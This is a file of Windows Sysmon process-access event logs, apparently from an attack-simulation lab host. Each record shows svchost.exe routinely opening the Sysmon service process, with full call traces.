{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1368,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1369,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1370,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1371,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1372,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1373,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1374,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1375,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
